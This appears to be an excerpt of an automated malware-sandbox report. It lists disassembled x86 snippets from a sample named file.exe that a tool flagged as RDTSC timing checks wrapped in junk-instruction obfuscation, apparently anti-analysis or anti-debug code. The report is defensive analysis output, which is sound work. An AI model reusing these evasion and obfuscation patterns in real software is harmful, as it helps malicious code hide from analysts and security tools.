                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B0EC second address: CA1C93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 13C84B78h 0x0000000d sub dword ptr [ebp+122D1FCCh], edx 0x00000013 push dword ptr [ebp+122D1711h] 0x00000019 mov di, dx 0x0000001c call dword ptr [ebp+122D2B9Bh] 0x00000022 pushad 0x00000023 jmp 00007F47DD40FB7Eh 0x00000028 stc 0x00000029 xor eax, eax 0x0000002b mov dword ptr [ebp+122D2A10h], ebx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 cmc 0x00000036 mov dword ptr [ebp+122D2F36h], eax 0x0000003c pushad 0x0000003d jmp 00007F47DD40FB88h 0x00000042 jnp 00007F47DD40FB78h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D2A10h], eax 0x00000051 mov esi, 0000003Ch 0x00000056 sub dword ptr [ebp+122D3984h], ebx 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 sub dword ptr [ebp+122D2B79h], edx 0x00000066 cmc 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D3984h], edi 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jl 00007F47DD40FB7Ch 0x00000079 or dword ptr [ebp+122D1A7Ch], eax 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jnl 00007F47DD40FB84h 0x00000089 jmp 00007F47DD40FB7Eh 0x0000008e nop 0x0000008f jnc 00007F47DD40FB84h 0x00000095 push eax 0x00000096 pushad 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007F47DD40FB80h 0x0000009e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B12A second address: E1B16D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47DCFB8A3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F47DCFB8A42h 0x00000012 mov edx, ebx 0x00000014 pop ecx 0x00000015 push 00000000h 0x00000017 mov dh, 86h 0x00000019 call 00007F47DCFB8A39h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F47DCFB8A3Ch 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B16D second address: E1B173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B173 second address: E1B177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B177 second address: E1B18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F47DD40FB76h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B18C second address: E1B1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A43h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B1A3 second address: E1B1EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F47DD40FB7Ch 0x00000015 popad 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jnp 00007F47DD40FB7Ch 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a jmp 00007F47DD40FB7Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 jc 00007F47DD40FB76h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B1EB second address: E1B1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B1EF second address: E1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov cx, ax 0x0000000b or si, B954h 0x00000010 push 00000003h 0x00000012 mov esi, 47CBA900h 0x00000017 xor dword ptr [ebp+122D22A9h], ebx 0x0000001d push 00000000h 0x0000001f mov ecx, 40D54793h 0x00000024 push 00000003h 0x00000026 xor dword ptr [ebp+122D1B55h], eax 0x0000002c push C54DA7BBh 0x00000031 pushad 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 jmp 00007F47DD40FB81h 0x0000003d popad 0x0000003e xor dword ptr [esp], 054DA7BBh 0x00000045 mov dword ptr [ebp+122D3B06h], eax 0x0000004b lea ebx, dword ptr [ebp+1244D011h] 0x00000051 push 00000000h 0x00000053 push edx 0x00000054 call 00007F47DD40FB78h 0x00000059 pop edx 0x0000005a mov dword ptr [esp+04h], edx 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc edx 0x00000067 push edx 0x00000068 ret 0x00000069 pop edx 0x0000006a ret 0x0000006b push eax 0x0000006c jbe 00007F47DD40FBACh 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F47DD40FB88h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B32C second address: E1B330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B330 second address: E1B33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B33A second address: E1B33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B33E second address: E1B34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B34B second address: E1B371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D39F0h], edi 0x00000011 push 00000000h 0x00000013 mov si, 756Ah 0x00000017 call 00007F47DCFB8A39h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B371 second address: E1B375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B375 second address: E1B37B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B37B second address: E1B3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F47DD40FB76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F47DD40FB84h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B3A7 second address: E1B3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F47DCFB8A3Ch 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B3CE second address: E1B470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F47DD40FB85h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jp 00007F47DD40FB78h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F47DD40FB78h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov ecx, eax 0x0000003a push 00000000h 0x0000003c mov edx, eax 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F47DD40FB78h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a jmp 00007F47DD40FB7Bh 0x0000005f sub dword ptr [ebp+122D2B95h], edi 0x00000065 call 00007F47DD40FB79h 0x0000006a push eax 0x0000006b push edx 0x0000006c jne 00007F47DD40FB7Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B470 second address: E1B47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F47DCFB8A36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B47A second address: E1B4CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F47DD40FB85h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jbe 00007F47DD40FB82h 0x0000001b jne 00007F47DD40FB7Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B599 second address: E1B59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B692 second address: E1B6C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F47DD40FB7Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 ja 00007F47DD40FB82h 0x00000018 mov eax, dword ptr [eax] 0x0000001a js 00007F47DD40FB7Eh 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B6C8 second address: E1B6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E22A second address: E2E22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C853 second address: E3C859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A79F second address: E3A7B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB82h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A7B5 second address: E3A7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A943 second address: E3A9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jne 00007F47DD40FB83h 0x0000000f jg 00007F47DD40FB91h 0x00000015 jmp 00007F47DD40FB7Bh 0x0000001a popad 0x0000001b pushad 0x0000001c push esi 0x0000001d jmp 00007F47DD40FB84h 0x00000022 jmp 00007F47DD40FB86h 0x00000027 pop esi 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AB12 second address: E3AB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AC6A second address: E3AC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F47DD40FB83h 0x0000000b pop ebx 0x0000000c jnp 00007F47DD40FB92h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AF17 second address: E3AF32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A45h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B260 second address: E3B26E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DD40FB7Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B26E second address: E3B29D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DCFB8A48h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnl 00007F47DCFB8A57h 0x00000013 pushad 0x00000014 jc 00007F47DCFB8A36h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B417 second address: E3B41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B85D second address: E3B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jne 00007F47DCFB8A36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F47DCFB8A44h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B888 second address: E3B88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E318CD second address: E318DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F47DCFB8A38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0430B second address: E04311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04311 second address: E04317 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C2A8 second address: E3C2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3C6C6 second address: E3C6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F47DCFB8A36h 0x0000000c popad 0x0000000d je 00007F47DCFB8A3Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4109A second address: E410A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E410A0 second address: E41103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jng 00007F47DCFB8A4Dh 0x00000016 jmp 00007F47DCFB8A47h 0x0000001b jbe 00007F47DCFB8A38h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F47DCFB8A47h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41103 second address: E4110D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F991 second address: E3F997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4522C second address: E45246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E45246 second address: E452A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F47DCFB8A3Eh 0x0000000b jnp 00007F47DCFB8A36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F47DCFB8A48h 0x0000001a jmp 00007F47DCFB8A3Eh 0x0000001f jmp 00007F47DCFB8A3Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F47DCFB8A47h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49FFB second address: E49FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49FFF second address: E4A011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F47DCFB8A36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A011 second address: E4A015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A015 second address: E4A01B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A648 second address: E4A64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C79C second address: E4C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7A1 second address: E4C7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7B4 second address: E4C7CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F47DCFB8A36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jc 00007F47DCFB8A36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C7CF second address: E4C7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2F1 second address: E4D2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D2F7 second address: E4D2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D4AA second address: E4D4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D913 second address: E4D93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F47DD40FB76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F47DD40FB84h 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D93A second address: E4D956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D2B90h], edx 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D956 second address: E4D95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DE67 second address: E4DEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F47DCFB8A38h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov si, BEBDh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F47DCFB8A38h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 pushad 0x00000047 push esi 0x00000048 sub dword ptr [ebp+122D3402h], eax 0x0000004e pop esi 0x0000004f jmp 00007F47DCFB8A46h 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F47DCFB8A41h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E8BE second address: E4E933 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F47DD40FB7Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F47DD40FB78h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D1B51h], esi 0x0000002e jnc 00007F47DD40FB7Ch 0x00000034 push 00000000h 0x00000036 movzx edi, cx 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push ebx 0x0000003c jmp 00007F47DD40FB7Eh 0x00000041 pop ebx 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 pop edx 0x00000046 popad 0x00000047 push eax 0x00000048 je 00007F47DD40FB7Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E75E second address: E4E777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F75C second address: E4F82B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47DD40FB88h 0x00000008 jmp 00007F47DD40FB88h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jnl 00007F47DD40FB89h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F47DD40FB78h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 call 00007F47DD40FB86h 0x00000038 pop edi 0x00000039 mov dword ptr [ebp+122D3402h], ecx 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007F47DD40FB78h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D2438h], ebx 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 jno 00007F47DD40FB7Ch 0x00000069 jc 00007F47DD40FB7Ch 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5020A second address: E5020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E502C0 second address: E502C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
